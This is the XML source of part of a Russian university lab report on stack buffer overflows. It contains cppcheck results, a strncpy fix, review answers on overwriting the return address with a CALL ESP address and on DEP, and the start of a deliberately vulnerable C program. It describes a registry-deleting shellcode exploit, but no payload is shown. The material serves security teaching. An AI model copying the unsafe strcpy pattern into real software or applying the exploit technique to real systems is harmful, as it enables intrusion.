          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Переполнение буфера в строке 8 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) утилитой не обнаружено — по причине отсутствия заголовочных файлов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cppcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> не смог проанализировать поведение функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Это демонстрирует ограничения статического анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F7B79" w14:textId="10B7600D" w:rsidR="00AD107B" w:rsidRPr="00AD107B" w:rsidRDefault="00AD107B" w:rsidP="00440CA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее используя инструкции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cppcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>обновляем программу. После запуска</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> тестовая директория </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>осталась</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strncpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>в буфер записалось 5 байт</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> скопировались </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">адрес </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>и шелл-код не был скопирован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6CFC17" w14:textId="22B444BC" w:rsidR="00AD107B" w:rsidRDefault="00AD107B" w:rsidP="00C94F45">
      <w:pPr>
        <w:pStyle w:val="afd"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD107B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2362A28F" wp14:editId="766E912E">
            <wp:extent cx="5873216" cy="1646773"/>
            <wp:effectExtent l="19050" t="19050" r="13335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487" cy="16532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BDAA79" w14:textId="05FC9292" w:rsidR="00C94F45" w:rsidRPr="00C94F45" w:rsidRDefault="00C94F45" w:rsidP="00C94F45">
      <w:pPr>
        <w:pStyle w:val="a1"/>
      </w:pPr>
      <w:r>
        <w:t>– Корректное завершение работы программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B6911" w14:textId="5BA12740" w:rsidR="00AD107B" w:rsidRPr="00C94F45" w:rsidRDefault="00C94F45" w:rsidP="00C94F45">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs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lastRenderedPageBreak/>
        <w:t>Утилита не обнаружила уязвимости типа «переполнение буфера» ввиду отсутствия настроенных путей к системным заголовочным файлам. Это подтверждает</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F45">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> что эффективность статического анализа напрямую зависит от корректности его настройки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D095F91" w14:textId="05778EAC" w:rsidR="0014500B" w:rsidRDefault="00FE0064" w:rsidP="001F2E83">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc225271648"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ответы на контрольные вопросы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5261EC77" w14:textId="6677D0CC" w:rsidR="00ED0A21" w:rsidRPr="00614CB9" w:rsidRDefault="00610C6C" w:rsidP="00ED0A21">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc225271649"/>
      <w:r>
        <w:t xml:space="preserve">Какие основные этапы выделяют при реализации атаки, эксплуатирующей уязвимости типа </w:t>
      </w:r>
      <w:r w:rsidRPr="00610C6C">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>переполнение буфера</w:t>
      </w:r>
      <w:r w:rsidRPr="00610C6C">
        <w:t>”?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1ABC2179" w14:textId="69E58903" w:rsidR="008E415A" w:rsidRDefault="008E415A" w:rsidP="006B6886">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Определение длины буфера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528B2006" w14:textId="13F9E3D9" w:rsidR="008E415A" w:rsidRPr="008E415A" w:rsidRDefault="008E415A" w:rsidP="006B6886">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Создание шелл-кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF4D04" w14:textId="2F943B70" w:rsidR="008E415A" w:rsidRPr="00FC6AF6" w:rsidRDefault="008E415A" w:rsidP="006B6886">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Адрес возврата меняется </w:t>
      </w:r>
      <w:r w:rsidR="00FC6AF6">
        <w:t xml:space="preserve">на адрес инструкции </w:t>
      </w:r>
      <w:r w:rsidR="00FC6AF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r w:rsidR="00FC6AF6" w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6AF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidR="00FC6AF6" w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FC6AF6">
        <w:t>что позволяет передать управление на шелл-код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39195954" w14:textId="728BBEA2" w:rsidR="00ED0A21" w:rsidRPr="00AD4DA8" w:rsidRDefault="00610C6C" w:rsidP="00ED0A21">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc225271650"/>
      <w:r>
        <w:t>Почему стек является уязвимым при передаче параметров функции?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="48D0D975" w14:textId="25DB6F68" w:rsidR="00AD4DA8" w:rsidRPr="001D7AE5" w:rsidRDefault="00FC6AF6" w:rsidP="00610C6C">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>Стек является уязвимым, потому что в нём хранится </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6AF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>адрес возврата</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t> из функции (значение регистра EIP). Если функция не контролирует границы массивов (например, использует </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t> без проверки длины), то при переполнении буфера, выделенного в стеке для локальных переменных, данные могут выйти за его пределы и перезаписать следующие области стека, включая сохранённый адрес возврата. Это позволяет злоумышленнику изменить ход выполнения программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA1330" w14:textId="2E4ACBA6" w:rsidR="00ED0A21" w:rsidRDefault="008E415A" w:rsidP="00ED0A21">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc225271651"/>
      <w:r>
        <w:t xml:space="preserve">Одинаков ли адрес </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r w:rsidRPr="008E415A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidRPr="008E415A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в различных версия ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="210B28FF" w14:textId="52950602" w:rsidR="00216659" w:rsidRPr="00AD4DA8" w:rsidRDefault="00216659" w:rsidP="008E415A">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6AF6" w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve">Нет, адрес инструкции CALL ESP (или любой другой инструкции) в системных библиотеках (например, KERNEL32.DLL) не одинаков в различных версиях операционной системы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC6AF6" w:rsidRPr="00FC6AF6">
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC6AF6" w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve">. Адреса загрузки библиотек и расположение в них машинных инструкций могут меняться от версии к версии, а также зависеть от обновлений системы. Это является одним из методов защиты, затрудняющим создание универсальных </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC6AF6" w:rsidRPr="00FC6AF6">
        <w:t>эксплойтов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC6AF6" w:rsidRPr="00FC6AF6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C67F21" w14:textId="32AC32C4" w:rsidR="00ED0A21" w:rsidRPr="00614CB9" w:rsidRDefault="008E415A" w:rsidP="00ED0A21">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc225271652"/>
      <w:r>
        <w:t>Могут ли инструкции быть выполнены где-либо кроме сегмента кода?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="269EDCD7" w14:textId="43273439" w:rsidR="009B366C" w:rsidRPr="008E415A" w:rsidRDefault="00FC6AF6" w:rsidP="008E415A">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>Да, инструкции могут быть выполнены в других сегментах памяти (например, в сегменте данных или стеке), если в этих сегментах разрешено исполнение кода.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6AF6">
        <w:br/>
        <w:t xml:space="preserve">В классической архитектуре </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>Intel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve"> и старых версиях </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve"> это было возможно, что позволяло выполнять шелл-код, помещённый в буфер в стеке. Однако в современных системах существуют механизмы защиты, такие как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>Data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:lastRenderedPageBreak/>
        <w:t>Prevention</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve"> (DEP), которые запрещают выполнение кода в областях памяти, помеченных как данные (стек, куча), что значительно усложняет эксплуатацию уязвимостей переполнения буфера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26049FD5" w14:textId="12E410D0" w:rsidR="00ED0A21" w:rsidRDefault="008E415A" w:rsidP="00ED0A21">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc225271653"/>
      <w:r>
        <w:t xml:space="preserve">Опишите работу механизма защиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="008E415A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="008E415A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="008E415A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Каким образом он позволяет защитить систему от эксплуатации уязвимостей типа </w:t>
      </w:r>
      <w:r w:rsidRPr="008E415A">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>переполнение буфера</w:t>
      </w:r>
      <w:r w:rsidRPr="008E415A">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="25A7B9E3" w14:textId="4B4728AE" w:rsidR="008E415A" w:rsidRPr="008E415A" w:rsidRDefault="00FC6AF6" w:rsidP="00832B3B">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t>Э</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>то механизм защиты, который отслеживает, разрешено ли выполнение кода в определённой области памяти. Память помечается специальными атрибутами.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6AF6">
        <w:br/>
        <w:t xml:space="preserve">При попытке процессора выполнить инструкцию из области памяти, которая помечена как недоступная для выполнения (например, из стека, кучи или страниц данных), процессор генерирует исключение, и программа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t>аварийно</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC6AF6">
        <w:t xml:space="preserve"> завершается.</w:t>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="23FF6051" w14:textId="11CA28EC" w:rsidR="00AE1FDE" w:rsidRDefault="00C93DCC" w:rsidP="001F2E83">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc225271654"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Выводы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="27DB57BE" w14:textId="033CE567" w:rsidR="00FC6AF6" w:rsidRDefault="00FC6AF6" w:rsidP="00FC6AF6">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t>В ходе выполнения лабораторной работы была разработана уязвимая программа, демонстрирующая наличие ошибки типа «переполнение буфера» вследствие использования небезопасной функции копирования строк без контроля длины входных данных. Был создан шелл-код, предназначенный для удаления заданного ключа системного реестра, а также разработана эксплуатирующая программа, которая сформировала входную строку, перезаписывающую адрес возврата в стеке и передающую управление на шелл-код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609F5897" w14:textId="0E5008B0" w:rsidR="00FC6AF6" w:rsidRPr="003A19D9" w:rsidRDefault="00FC6AF6" w:rsidP="005A337A">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t>В результате практического эксперимента удалось успешно выполнить эксплуатацию уязвимости и убедиться в корректной работе шелл-кода. Это позволило наглядно изучить механизм перезаписи адреса возврата, структуру стека до и после переполнения, а также принципы организации атаки на программное обеспечение с использованием данной уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171ED45A" w14:textId="669E730B" w:rsidR="00D740EB" w:rsidRPr="00960483" w:rsidRDefault="00D740EB" w:rsidP="001F2E83">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc225271655"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="58EB442E" w14:textId="1D2AEEE7" w:rsidR="00ED789F" w:rsidRPr="00452A08" w:rsidRDefault="001A39AF" w:rsidP="001D0E55">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Код </w:t>
      </w:r>
      <w:r w:rsidR="00FE0064">
        <w:t>утил</w:t>
      </w:r>
      <w:r w:rsidR="008E415A">
        <w:t xml:space="preserve">иты </w:t>
      </w:r>
      <w:r w:rsidR="008E415A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008E415A">
        <w:t>переполнение</w:t>
      </w:r>
      <w:r w:rsidR="008E415A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008E415A">
        <w:t xml:space="preserve"> буфера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397DC21D" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>define</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve"> _CRT_SECURE_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288CA662" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7BAE5" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29AD00" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DE8942" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0090221C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E445B8D" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0090221C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> buffer[6];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F79215E" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0090221C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a[] = { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" };</w:t>
      </w:r>
    </w:p>
